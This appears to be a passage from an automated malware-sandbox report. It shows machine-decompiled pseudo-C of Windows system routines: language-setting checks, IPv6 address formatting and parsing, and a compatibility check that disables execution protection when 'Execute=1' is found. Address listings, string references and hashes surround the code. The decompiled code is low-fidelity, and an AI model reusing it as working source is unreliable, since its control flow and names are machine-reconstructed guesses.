				_t339 = _t335 + 4;
				if(_t322 == _t318) {
					_v28 = _t318;
				} else {
					_v28 = E0075E0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
				}
				if(_v28 == _t318) {
					_v48 = _t318;
					goto L58;
				} else {
					E00752340(_v28, _v8, _v24);
					_v16 = _v28;
					_a4 = _t318;
					_t288 = E0076E679(_v28, _t332);
					_t335 = _t339 + 0x14;
					while(1) {
						_v12 = _t288;
						if(_t288 == _t318) {
							break;
						}
						_v12 = _v12 + 2;
						 *_v12 = 0;
						E0075E2A8(_v12,  &_v68, _v16);
						if(E00775553(_t328,  &_v68,  &_v36) != 0) {
							_a4 = _a4 + 1;
						}
						_v16 = _v12;
						_t288 = E0076E679(_v12, _t332);
						_pop(_t322);
					}
					_t296 = _v16;
					if( *_v16 != _t318) {
						E0075E2A8(_t322,  &_v68, _t296);
						if(E00775553(_t328,  &_v68,  &_v36) != 0) {
							_a4 = _a4 + 1;
						}
					}
					if(_a4 == _t318) {
						E0075E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v28);
						_v48 = _t318;
						_v28 = _t318;
					}
					if(_v8 != _t318) {
						E0075E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
					}
					_v8 = _t318;
					goto L17;
				}
			}





































                                          0x00778788
                                          0x00778788
                                          0x00778791
                                          0x00778794
                                          0x00778798
                                          0x0077879b
                                          0x0077879e
                                          0x007787a1
                                          0x007787a4
                                          0x007787a7
                                          0x007787aa
                                          0x007787af
                                          0x007c1ad3
                                          0x00778b0a
                                          0x00778b0d
                                          0x00778b13
                                          0x00778b19
                                          0x00778b1f
                                          0x00778b25
                                          0x00778b2b
                                          0x00778b31
                                          0x00778b37
                                          0x00778b3d
                                          0x00778b46
                                          0x00778b46
                                          0x007787c6
                                          0x007787d0
                                          0x007c1ae0
                                          0x007c1ae6
                                          0x007c1af8
                                          0x007c1af8
                                          0x007c1afd
                                          0x007c1afe
                                          0x007c1b01
                                          0x007c1b06
                                          0x007c1b06
                                          0x007787d6
                                          0x007787f2
                                          0x007787f7
                                          0x00778807
                                          0x0077880a
                                          0x0077880f
                                          0x00778810
                                          0x00778813
                                          0x00778818
                                          0x00778818
                                          0x0077882c
                                          0x00778831
                                          0x00778838
                                          0x00778908
                                          0x00778920
                                          0x007789f0
                                          0x00778a08
                                          0x00778af6
                                          0x00778af6
                                          0x00778af8
                                          0x00778afb
                                          0x007c1beb
                                          0x007c1beb
                                          0x00778b04
                                          0x007c1bf8
                                          0x007c1c0e
                                          0x007c1c13
                                          0x007c1c16
                                          0x007c1c16
                                          0x007c1bf8
                                          0x00000000
                                          0x00778b04
                                          0x00778a0e
                                          0x00778a11
                                          0x00778a14
                                          0x00778a15
                                          0x00778a18
                                          0x00778a22
                                          0x00778b59
                                          0x00778a28
                                          0x00778a3c
                                          0x00778a3c
                                          0x00778a42
                                          0x007c1bb0
                                          0x007c1b11
                                          0x007c1b11
                                          0x00000000
                                          0x00778a48
                                          0x00778a51
                                          0x00778a5b
                                          0x00778a5e
                                          0x00778a61
                                          0x00778a69
                                          0x00778a69
                                          0x00778a6d
                                          0x00000000
                                          0x00000000
                                          0x00778a74
                                          0x00778a7c
                                          0x00778a7d
                                          0x00778a91
                                          0x00778a93
                                          0x00778a93
                                          0x00778a98
                                          0x00778a9b
                                          0x00778aa1
                                          0x00778aa1
                                          0x00778aa4
                                          0x00778aaa
                                          0x00778ab1
                                          0x00778ac5
                                          0x00778ac7
                                          0x00778ac7
                                          0x00778ac5
                                          0x00778ace
                                          0x007c1bc9
                                          0x007c1bce
                                          0x007c1bd2
                                          0x007c1bd2
                                          0x00778ad8
                                          0x00778aeb
                                          0x00778aeb
                                          0x00778af0
                                          0x00778af4
                                          0x00000000
                                          0x00778af4
                                          0x00778a42
                                          0x00778926
                                          0x00778929
                                          0x0077892c
                                          0x0077892d
                                          0x00778930
                                          0x00778935
                                          0x0077893a
                                          0x00778b51
                                          0x00778940
                                          0x00778954
                                          0x00778954
                                          0x0077895a
                                          0x007c1b63
                                          0x00000000
                                          0x00778960
                                          0x00778969
                                          0x00778973
                                          0x00778976
                                          0x00778979
                                          0x0077897e
                                          0x00778981
                                          0x00778981
                                          0x00778986
                                          0x00000000
                                          0x00000000
                                          0x007c1b6e
                                          0x007c1b74
                                          0x007c1b7b
                                          0x007c1b8f
                                          0x007c1b91
                                          0x007c1b91
                                          0x007c1b99
                                          0x007c1b9c
                                          0x007c1ba2
                                          0x007c1ba2
                                          0x0077898c
                                          0x00778992
                                          0x00778999
                                          0x007789ad
                                          0x007c1ba8
                                          0x007c1ba8
                                          0x007789ad
                                          0x007789b6
                                          0x007789c8
                                          0x007789cd
                                          0x007789d0
                                          0x007789d0
                                          0x007789d6
                                          0x007789e8
                                          0x007789e8
                                          0x007789ed
                                          0x00000000
                                          0x007789ed
                                          0x0077895a
                                          0x0077883e
                                          0x00778841
                                          0x00778844
                                          0x00778845
                                          0x00778848
                                          0x0077884d
                                          0x00778852
                                          0x00778b49
                                          0x00778858
                                          0x0077886c
                                          0x0077886c
                                          0x00778872
                                          0x007c1b0e
                                          0x00000000
                                          0x00778878
                                          0x00778881
                                          0x0077888b
                                          0x0077888e
                                          0x00778891
                                          0x00778896
                                          0x00778899
                                          0x00778899
                                          0x0077889e
                                          0x00000000
                                          0x00000000
                                          0x007c1b21
                                          0x007c1b27
                                          0x007c1b2e
                                          0x007c1b42
                                          0x007c1b44
                                          0x007c1b44
                                          0x007c1b4c
                                          0x007c1b4f
                                          0x007c1b55
                                          0x007c1b55
                                          0x007788a4
                                          0x007788aa
                                          0x007788b1
                                          0x007788c5
                                          0x007c1b5b
                                          0x007c1b5b
                                          0x007788c5
                                          0x007788ce
                                          0x007788e0
                                          0x007788e5
                                          0x007788e8
                                          0x007788e8
                                          0x007788ee
                                          0x00778900
                                          0x00778900
                                          0x00778905
                                          0x00000000
                                          0x00778905

                                          APIs
                                          Strings
                                          • WindowsExcludedProcs, xrefs: 007787C1
                                          • Kernel-MUI-Language-Disallowed, xrefs: 00778914
                                          • Kernel-MUI-Number-Allowed, xrefs: 007787E6
                                          • Kernel-MUI-Language-SKU, xrefs: 007789FC
                                          • Kernel-MUI-Language-Allowed, xrefs: 00778827
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.495125436.0000000000740000.00000040.00000001.sdmp, Offset: 00730000, based on PE: true
                                          • Associated: 00000005.00000002.495121461.0000000000730000.00000040.00000001.sdmp Download File
                                          • Associated: 00000005.00000002.495211687.0000000000820000.00000040.00000001.sdmp Download File
                                          • Associated: 00000005.00000002.495216287.0000000000830000.00000040.00000001.sdmp Download File
                                          • Associated: 00000005.00000002.495220979.0000000000834000.00000040.00000001.sdmp Download File
                                          • Associated: 00000005.00000002.495225389.0000000000837000.00000040.00000001.sdmp Download File
                                          • Associated: 00000005.00000002.495229216.0000000000840000.00000040.00000001.sdmp Download File
                                          • Associated: 00000005.00000002.495253633.00000000008A0000.00000040.00000001.sdmp Download File
                                          Similarity
                                          • API ID: _wcspbrk
                                          • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                          • API String ID: 402402107-258546922
                                          • Opcode ID: ce9b8578de7136411f065d8a0ff9ea47d04859baed89fcc9c915b9c1c70ad6e3
                                          • Instruction ID: 4d86dd88e29ab23827764064ba8355b6916ea96654b65a300c5fddedc5020bf9
                                          • Opcode Fuzzy Hash: ce9b8578de7136411f065d8a0ff9ea47d04859baed89fcc9c915b9c1c70ad6e3
                                          • Instruction Fuzzy Hash: 89F107B1D00209EFCF51DF94C989DEEB7B9FF08340F10846AE509A7211EB79AA45DB61
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 007913CB, Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 195COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 38%
                                          			E007913CB(intOrPtr* _a4, intOrPtr _a8) {
				char _v8;
				intOrPtr _v12;
				intOrPtr* _v16;
				intOrPtr _v20;
				char _v24;
				intOrPtr _t71;
				signed int _t78;
				signed int _t86;
				char _t90;
				signed int _t91;
				signed int _t96;
				intOrPtr _t108;
				signed int _t114;
				void* _t115;
				intOrPtr _t128;
				intOrPtr* _t129;
				void* _t130;

				_t129 = _a4;
				_t128 = _a8;
				_t116 = 0;
				_t71 = _t128 + 0x5c;
				_v8 = 8;
				_v20 = _t71;
				if( *_t129 == 0) {
					if( *((intOrPtr*)(_t129 + 2)) != 0 ||  *((intOrPtr*)(_t129 + 4)) != 0 ||  *((intOrPtr*)(_t129 + 6)) != 0 ||  *(_t129 + 0xc) == 0) {
						goto L5;
					} else {
						_t96 =  *(_t129 + 8) & 0x0000ffff;
						if(_t96 != 0) {
							L38:
							if(_t96 != 0xffff ||  *(_t129 + 0xa) != _t116) {
								goto L5;
							} else {
								_push( *(_t129 + 0xf) & 0x000000ff);
								_push( *(_t129 + 0xe) & 0x000000ff);
								_push( *(_t129 + 0xd) & 0x000000ff);
								_t86 = E00787707(_t128, _t71 - _t128 >> 1, L"::ffff:0:%u.%u.%u.%u",  *(_t129 + 0xc) & 0x000000ff);
								L36:
								return _t128 + _t86 * 2;
							}
						}
						_t114 =  *(_t129 + 0xa) & 0x0000ffff;
						if(_t114 == 0) {
							L33:
							_t115 = 0x752926;
							L35:
							_push( *(_t129 + 0xf) & 0x000000ff);
							_push( *(_t129 + 0xe) & 0x000000ff);
							_push( *(_t129 + 0xd) & 0x000000ff);
							_push( *(_t129 + 0xc) & 0x000000ff);
							_t86 = E00787707(_t128, _t71 - _t128 >> 1, L"::%hs%u.%u.%u.%u", _t115);
							goto L36;
						}
						if(_t114 != 0xffff) {
							_t116 = 0;
							goto L38;
						}
						if(_t114 != 0) {
							_t115 = 0x759cac;
							goto L35;
						}
						goto L33;
					}
				} else {
					L5:
					_a8 = _t116;
					_a4 = _t116;
					_v12 = _t116;
					if(( *(_t129 + 8) & 0x0000fffd) == 0) {
						if( *(_t129 + 0xa) == 0xfe5e) {
							_v8 = 6;
						}
					}
					_t90 = _v8;
					if(_t90 <= _t116) {
						L11:
						if(_a8 - _a4 <= 1) {
							_a8 = _t116;
							_a4 = _t116;
						}
						_t91 = 0;
						if(_v8 <= _t116) {
							L22:
							if(_v8 < 8) {
								_push( *(_t129 + 0xf) & 0x000000ff);
								_push( *(_t129 + 0xe) & 0x000000ff);
								_push( *(_t129 + 0xd) & 0x000000ff);
								_t128 = _t128 + E00787707(_t128, _t71 - _t128 >> 1, L":%u.%u.%u.%u",  *(_t129 + 0xc) & 0x000000ff) * 2;
							}
							return _t128;
						} else {
							L14:
							L14:
							if(_a4 > _t91 || _t91 >= _a8) {
								if(_t91 != _t116 && _t91 != _a8) {
									_push(":");
									_push(_t71 - _t128 >> 1);
									_push(_t128);
									_t128 = _t128 + E00787707() * 2;
									_t71 = _v20;
									_t130 = _t130 + 0xc;
								}
								_t78 = E00787707(_t128, _t71 - _t128 >> 1, L"%x",  *(_t129 + _t91 * 2) & 0x0000ffff);
								_t130 = _t130 + 0x10;
							} else {
								_push(L"::");
								_push(_t71 - _t128 >> 1);
								_push(_t128);
								_t78 = E00787707();
								_t130 = _t130 + 0xc;
								_t91 = _a8 - 1;
							}
							_t91 = _t91 + 1;
							_t128 = _t128 + _t78 * 2;
							_t71 = _v20;
							if(_t91 >= _v8) {
								goto L22;
							}
							_t116 = 0;
							goto L14;
						}
					} else {
						_t108 = 1;
						_v16 = _t129;
						_v24 = _t90;
						do {
							if( *_v16 == _t116) {
								if(_t108 - _v12 > _a8 - _a4) {
									_a4 = _v12;
									_a8 = _t108;
								}
								_t116 = 0;
							} else {
								_v12 = _t108;
							}
							_v16 = _v16 + 2;
							_t108 = _t108 + 1;
							_t26 =  &_v24;
							 *_t26 = _v24 - 1;
						} while ( *_t26 != 0);
						goto L11;
					}
				}
			}




















                                          0x007913d5
                                          0x007913d9
                                          0x007913dc
                                          0x007913de
                                          0x007913e1
                                          0x007913e8
                                          0x007913ee
                                          0x007be8fd
                                          0x00000000
                                          0x007be921
                                          0x007be921
                                          0x007be928
                                          0x007be982
                                          0x007be98a
                                          0x00000000
                                          0x007be99a
                                          0x007be99e
                                          0x007be9a3
                                          0x007be9a8
                                          0x007be9b9
                                          0x007be978
                                          0x00000000
                                          0x007be978
                                          0x007be98a
                                          0x007be92a
                                          0x007be931
                                          0x007be944
                                          0x007be944
                                          0x007be950
                                          0x007be954
                                          0x007be959
                                          0x007be95e
                                          0x007be963
                                          0x007be970
                                          0x00000000
                                          0x007be975
                                          0x007be93b
                                          0x007be980
                                          0x00000000
                                          0x007be980
                                          0x007be942
                                          0x007be94b
                                          0x00000000
                                          0x007be94b
                                          0x00000000
                                          0x007be942
                                          0x007913f4
                                          0x007913f4
                                          0x007913f9
                                          0x007913fc
                                          0x007913ff
                                          0x00791406
                                          0x007be9cc
                                          0x007be9d2
                                          0x007be9d2
                                          0x007be9cc
                                          0x0079140c
                                          0x00791411
                                          0x00791431
                                          0x0079143a
                                          0x0079143c
                                          0x0079143f
                                          0x0079143f
                                          0x00791442
                                          0x00791447
                                          0x007914a8
                                          0x007914ac
                                          0x007be9e2
                                          0x007be9e7
                                          0x007be9ec
                                          0x007bea05
                                          0x007bea05
                                          0x00000000
                                          0x00791449
                                          0x00000000
                                          0x00791449
                                          0x0079144c
                                          0x00791459
                                          0x00791462
                                          0x00791469
                                          0x0079146a
                                          0x00791470
                                          0x00791473
                                          0x00791476
                                          0x00791476
                                          0x00791490
                                          0x00791495
                                          0x0079138e
                                          0x00791390
                                          0x00791397
                                          0x00791398
                                          0x00791399
                                          0x007913a1
                                          0x007913a4
                                          0x007913a4
                                          0x00791498
                                          0x0079149c
                                          0x0079149f
                                          0x007914a2
                                          0x00000000
                                          0x00000000
                                          0x007914a4
                                          0x00000000
                                          0x007914a4
                                          0x00791413
                                          0x00791415
                                          0x00791416
                                          0x00791419
                                          0x0079141c
                                          0x00791422
                                          0x007913b7
                                          0x007913bc
                                          0x007913bf
                                          0x007913bf
                                          0x007913c2
                                          0x00791424
                                          0x00791424
                                          0x00791424
                                          0x00791427
                                          0x0079142b
                                          0x0079142c
                                          0x0079142c
                                          0x0079142c
                                          0x00000000
                                          0x0079141c
                                          0x00791411

                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.495125436.0000000000740000.00000040.00000001.sdmp, Offset: 00730000, based on PE: true
                                          • Associated: 00000005.00000002.495121461.0000000000730000.00000040.00000001.sdmp Download File
                                          • Associated: 00000005.00000002.495211687.0000000000820000.00000040.00000001.sdmp Download File
                                          • Associated: 00000005.00000002.495216287.0000000000830000.00000040.00000001.sdmp Download File
                                          • Associated: 00000005.00000002.495220979.0000000000834000.00000040.00000001.sdmp Download File
                                          • Associated: 00000005.00000002.495225389.0000000000837000.00000040.00000001.sdmp Download File
                                          • Associated: 00000005.00000002.495229216.0000000000840000.00000040.00000001.sdmp Download File
                                          • Associated: 00000005.00000002.495253633.00000000008A0000.00000040.00000001.sdmp Download File
                                          Similarity
                                          • API ID: ___swprintf_l
                                          • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                          • API String ID: 48624451-2108815105
                                          • Opcode ID: 64d8934264c26cb42c1a92a114b0e12b3216144e2c659005e08f0f8f5fb70820
                                          • Instruction ID: 525183e150b16c868e4e4a1aed8134cfe34b1cc8fa6301d4ca65260ee5d75097
                                          • Opcode Fuzzy Hash: 64d8934264c26cb42c1a92a114b0e12b3216144e2c659005e08f0f8f5fb70820
                                          • Instruction Fuzzy Hash: 126147B1900656EACF34DF59D8808FE7BB5EF98301B98C02DE99647640D37CAA54CBA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00787EFD, Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 127COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 64%
                                          			E00787EFD(void* __ecx, intOrPtr _a4) {
				signed int _v8;
				char _v540;
				unsigned int _v544;
				signed int _v548;
				intOrPtr _v552;
				char _v556;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t33;
				void* _t38;
				unsigned int _t46;
				unsigned int _t47;
				unsigned int _t52;
				intOrPtr _t56;
				unsigned int _t62;
				void* _t69;
				void* _t70;
				intOrPtr _t72;
				signed int _t73;
				void* _t74;
				void* _t75;
				void* _t76;
				void* _t77;

				_t33 =  *0x832088; // 0x76c6953a
				_v8 = _t33 ^ _t73;
				_v548 = _v548 & 0x00000000;
				_t72 = _a4;
				if(E00787F4F(__ecx, _t72 + 0x2c,  &_v548) >= 0) {
					__eflags = _v548;
					if(_v548 == 0) {
						goto L1;
					}
					_t62 = _t72 + 0x24;
					E007A3F92(0x55, 3, "CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions\n", _v548);
					_t71 = 0x214;
					_v544 = 0x214;
					E0075DFC0( &_v540, 0, 0x214);
					_t75 = _t74 + 0x20;
					_t46 =  *0x834218( *((intOrPtr*)(_t72 + 0x28)),  *((intOrPtr*)(_t72 + 0x18)),  *((intOrPtr*)(_t72 + 0x20)), L"ExecuteOptions",  &_v556,  &_v540,  &_v544, _t62);
					__eflags = _t46;
					if(_t46 == 0) {
						goto L1;
					}
					_t47 = _v544;
					__eflags = _t47;
					if(_t47 == 0) {
						goto L1;
					}
					__eflags = _t47 - 0x214;
					if(_t47 >= 0x214) {
						goto L1;
					}
					_push(_t62);
					 *((short*)(_t73 + (_t47 >> 1) * 2 - 0x21a)) = 0;
					E007A3F92(0x55, 3, "CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database\n",  &_v540);
					_t52 = E00760D27( &_v540, L"Execute=1");
					_t76 = _t75 + 0x1c;
					_push(_t62);
					__eflags = _t52;
					if(_t52 == 0) {
						E007A3F92(0x55, 3, "CLIENT(ntdll): Processing %ws for patching section protection for %wZ\n",  &_v540);
						_t71 =  &_v540;
						_t56 = _t73 + _v544 - 0x218;
						_t77 = _t76 + 0x14;
						_v552 = _t56;
						__eflags = _t71 - _t56;
						if(_t71 >= _t56) {
							goto L1;
						} else {
							goto L10;
						}
						while(1) {
							L10:
							_t62 = E00768375(_t71, 0x20);
							_pop(_t69);
							__eflags = _t62;
							if(__eflags != 0) {
								__eflags = 0;
								 *_t62 = 0;
							}
							E007A3F92(0x55, 3, "CLIENT(ntdll): Processing section info %ws...\n", _t71);
							_t77 = _t77 + 0x10;
							E007CE8DB(_t69, _t70, __eflags, _t72, _t71);
							__eflags = _t62;
							if(_t62 == 0) {
								goto L1;
							}
							_t31 = _t62 + 2; // 0x2
							_t71 = _t31;
							__eflags = _t71 - _v552;
							if(_t71 >= _v552) {
								goto L1;
							}
						}
					}
					_push("CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ\n");
					_push(3);
					_push(0x55);
					E007A3F92();
					_t38 = 1;
					L2:
					return E0075E1B4(_t38, _t62, _v8 ^ _t73, _t70, _t71, _t72);
				}
				L1:
				_t38 = 0;
				goto L2;
			}



























                                          0x00787f08
                                          0x00787f0f
                                          0x00787f12
                                          0x00787f1b
                                          0x00787f31
                                          0x007a3ead
                                          0x007a3eb4
                                          0x00000000
                                          0x00000000
                                          0x007a3eba
                                          0x007a3ecd
                                          0x007a3ed2
                                          0x007a3ee1
                                          0x007a3ee7
                                          0x007a3eec
                                          0x007a3f12
                                          0x007a3f18
                                          0x007a3f1a
                                          0x00000000
                                          0x00000000
                                          0x007a3f20
                                          0x007a3f26
                                          0x007a3f28
                                          0x00000000
                                          0x00000000
                                          0x007a3f2e
                                          0x007a3f30
                                          0x00000000
                                          0x00000000
                                          0x007a3f3a
                                          0x007a3f3b
                                          0x007a3f53
                                          0x007a3f64
                                          0x007a3f69
                                          0x007a3f6c
                                          0x007a3f6d
                                          0x007a3f6f
                                          0x007ae304
                                          0x007ae30f
                                          0x007ae315
                                          0x007ae31e
                                          0x007ae321
                                          0x007ae327
                                          0x007ae329
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x007ae32f
                                          0x007ae32f
                                          0x007ae337
                                          0x007ae33a
                                          0x007ae33b
                                          0x007ae33d
                                          0x007ae33f
                                          0x007ae341
                                          0x007ae341
                                          0x007ae34e
                                          0x007ae353
                                          0x007ae358
                                          0x007ae35d
                                          0x007ae35f
                                          0x00000000
                                          0x00000000
                                          0x007ae365
                                          0x007ae365
                                          0x007ae368
                                          0x007ae36e
                                          0x00000000
                                          0x00000000
                                          0x007ae374
                                          0x007ae32f
                                          0x007a3f75
                                          0x007a3f7a
                                          0x007a3f7c
                                          0x007a3f7e
                                          0x007a3f86
                                          0x00787f39
                                          0x00787f47
                                          0x00787f47
                                          0x00787f37
                                          0x00787f37
                                          0x00000000

                                          APIs
                                          • BaseQueryModuleData.KERNEL32(?,00000000,00000000,ExecuteOptions,?,?,?), ref: 007A3F12
                                          Strings
                                          • Execute=1, xrefs: 007A3F5E
                                          • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 007A3F75
                                          • ExecuteOptions, xrefs: 007A3F04
                                          • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 007A3F4A
                                          • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 007A3EC4
                                          • CLIENT(ntdll): Processing section info %ws..., xrefs: 007AE345
                                          • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 007AE2FB
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.495125436.0000000000740000.00000040.00000001.sdmp, Offset: 00730000, based on PE: true
                                          • Associated: 00000005.00000002.495121461.0000000000730000.00000040.00000001.sdmp Download File
                                          • Associated: 00000005.00000002.495211687.0000000000820000.00000040.00000001.sdmp Download File
                                          • Associated: 00000005.00000002.495216287.0000000000830000.00000040.00000001.sdmp Download File
                                          • Associated: 00000005.00000002.495220979.0000000000834000.00000040.00000001.sdmp Download File
                                          • Associated: 00000005.00000002.495225389.0000000000837000.00000040.00000001.sdmp Download File
                                          • Associated: 00000005.00000002.495229216.0000000000840000.00000040.00000001.sdmp Download File
                                          • Associated: 00000005.00000002.495253633.00000000008A0000.00000040.00000001.sdmp Download File
                                          Similarity
                                          • API ID: BaseDataModuleQuery
                                          • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                          • API String ID: 3901378454-484625025
                                          • Opcode ID: d94f4c5561c8655b2131c5916fef7299bb71663a3b12eac7ed1899079fb70a9f
                                          • Instruction ID: 6b8a040df6364a84c5fa0d8309c37bfa40a076368d5868d037d57a2aedbd7d09
                                          • Opcode Fuzzy Hash: d94f4c5561c8655b2131c5916fef7299bb71663a3b12eac7ed1899079fb70a9f
                                          • Instruction Fuzzy Hash: 5941EC7168020CBADF20EE94DCC9FDA73BCAB55705F140599B605E6081E678EB46CB61
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00790B15, Relevance: 12.5, APIs: 4, Strings: 3, Instructions: 272COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E00790B15(intOrPtr* _a4, char _a7, intOrPtr* _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				void* _t108;
				void* _t116;
				char _t120;
				short _t121;
				void* _t128;
				intOrPtr* _t130;
				char _t132;
				short _t133;
				intOrPtr _t141;
				signed int _t156;
				signed int _t174;
				intOrPtr _t177;
				intOrPtr* _t179;
				intOrPtr _t180;
				void* _t183;

				_t179 = _a4;
				_t141 =  *_t179;
				_v16 = 0;
				_v28 = 0;
				_v8 = 0;
				_v24 = 0;
				_v12 = 0;
				_v32 = 0;
				_v20 = 0;
				if(_t141 == 0) {
					L41:
					 *_a8 = _t179;
					_t180 = _v24;
					if(_t180 != 0) {
						if(_t180 != 3) {
							goto L6;
						}
						_v8 = _v8 + 1;
					}
					_t174 = _v32;
					if(_t174 == 0) {
						if(_v8 == 7) {
							goto L43;
						}
						goto L6;
					}
					L43:
					if(_v16 != 1) {
						if(_v16 != 2) {
							goto L6;
						}
						 *((short*)(_a12 + _v20 * 2)) = 0;
						L47:
						if(_t174 != 0) {
							E00768980(_a12 + 0x10 + (_t174 - _v8) * 2, _a12 + _t174 * 2, _v8 - _t174 + _v8 - _t174);
							_t116 = 8;
							E0075DFC0(_a12 + _t174 * 2, 0, _t116 - _v8 + _t116 - _v8);
						}
						return 0;
					}
					if(_t180 != 0) {
						if(_v12 > 3) {
							goto L6;
						}
						_t120 = E00790CFA(_v28, 0, 0xa);
						_t183 = _t183 + 0xc;
						if(_t120 > 0xff) {
							goto L6;
						}
						 *((char*)(_t180 + _v20 * 2 + _a12)) = _t120;
						goto L47;
					}
					if(_v12 > 4) {
						goto L6;
					}
					_t121 = E00790CFA(_v28, _t180, 0x10);
					_t183 = _t183 + 0xc;
					 *((short*)(_a12 + _v20 * 2)) = _t121;
					goto L47;
				} else {
					while(1) {
						_t123 = _v16;
						if(_t123 == 0) {
							goto L7;
						}
						_t108 = _t123 - 1;
						if(_t108 != 0) {
							goto L1;
						}
						_t178 = _t141;
						if(E007906BA(_t108, _t141) == 0 || _t135 == 0) {
							if(E007906BA(_t135, _t178) == 0 || E00790A5B(_t136, _t178) == 0) {
								if(_t141 != 0x3a) {
									if(_t141 == 0x2e) {
										if(_a7 != 0 || _v24 > 2 || _v8 > 6) {
											goto L41;
										} else {
											_v24 = _v24 + 1;
											L27:
											_v16 = _v16 & 0x00000000;
											L28:
											if(_v28 == 0) {
												goto L20;
											}
											_t177 = _v24;
											if(_t177 != 0) {
												if(_v12 > 3) {
													L6:
													return 0xc000000d;
												}
												_t132 = E00790CFA(_v28, 0, 0xa);
												_t183 = _t183 + 0xc;
												if(_t132 > 0xff) {
													goto L6;
												}
												 *((char*)(_t177 + _v20 * 2 + _a12 - 1)) = _t132;
												goto L20;
											}
											if(_v12 > 4) {
												goto L6;
											}
											_t133 = E00790CFA(_v28, 0, 0x10);
											_t183 = _t183 + 0xc;
											_v20 = _v20 + 1;
											 *((short*)(_a12 + _v20 * 2)) = _t133;
											goto L20;
										}
									}
									goto L41;
								}
								if(_v24 > 0 || _v8 > 6) {
									goto L41;
								} else {
									_t130 = _t179 + 1;
									if( *_t130 == _t141) {
										if(_v32 != 0) {
											goto L41;
										}
										_v32 = _v8 + 1;
										_t156 = 2;
										_v8 = _v8 + _t156;
										L34:
										_t179 = _t130;
										_v16 = _t156;
										goto L28;
									}
									_v8 = _v8 + 1;
									goto L27;
								}
							} else {
								_v12 = _v12 + 1;
								if(_v24 > 0) {
									goto L41;
								}
								_a7 = 1;
								goto L20;
							}
						} else {
							_v12 = _v12 + 1;
							L20:
							_t179 = _t179 + 1;
							_t141 =  *_t179;
							if(_t141 == 0) {
								goto L41;
							}
							continue;
						}
						L7:
						if(_t141 == 0x3a) {
							if(_v24 > 0 || _v8 > 0) {
								goto L41;
							} else {
								_t130 = _t179 + 1;
								if( *_t130 != _t141) {
									goto L41;
								}
								_v20 = _v20 + 1;
								_t156 = 2;
								_v32 = 1;
								_v8 = _t156;
								 *((short*)(_a12 + _v20 * 2)) = 0;
								goto L34;
							}
						}
						L8:
						if(_v8 > 7) {
							goto L41;
						}
						_t142 = _t141;
						if(E007906BA(_t123, _t141) == 0 || _t124 == 0) {
							if(E007906BA(_t124, _t142) == 0 || E00790A5B(_t125, _t142) == 0 || _v24 > 0) {
								goto L41;
							} else {
								_t128 = 1;
								_a7 = 1;
								_v28 = _t179;
								_v16 = 1;
								_v12 = 1;
								L39:
								if(_v16 == _t128) {
									goto L20;
								}
								goto L28;
							}
						} else {
							_a7 = 0;
							_v28 = _t179;
							_v16 = 1;
							_v12 = 1;
							goto L20;
						}
					}
				}
				L1:
				_t123 = _t108 == 1;
				if(_t108 == 1) {
					goto L8;
				}
				_t128 = 1;
				goto L39;
			}

























                                          0x00790b21
                                          0x00790b24
                                          0x00790b27
                                          0x00790b2a
                                          0x00790b2d
                                          0x00790b30
                                          0x00790b33
                                          0x00790b36
                                          0x00790b39
                                          0x00790b3e
                                          0x00790c65
                                          0x00790c68
                                          0x00790c6a
                                          0x00790c6f
                                          0x007beb42
                                          0x00000000
                                          0x00000000
                                          0x007beb48
                                          0x007beb48
                                          0x00790c75
                                          0x00790c7a
                                          0x007beb54
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x007beb5a
                                          0x00790c80
                                          0x00790c84
                                          0x007beb98
                                          0x00000000
                                          0x00000000
                                          0x007beba6
                                          0x00790cb8
                                          0x00790cba
                                          0x00790cd3
                                          0x00790cda
                                          0x00790ce4
                                          0x00790ce9
                                          0x00000000
                                          0x00790cec
                                          0x00790c8c
                                          0x007beb63
                                          0x00000000
                                          0x00000000
                                          0x007beb70
                                          0x007beb75
                                          0x007beb7d
                                          0x00000000
                                          0x00000000
                                          0x007beb8c
                                          0x00000000
                                          0x007beb8c
                                          0x00790c96
                                          0x00000000
                                          0x00000000
                                          0x00790ca2
                                          0x00790cac
                                          0x00790cb4
                                          0x00000000
                                          0x00000000
                                          0x00790b44
                                          0x00790b47
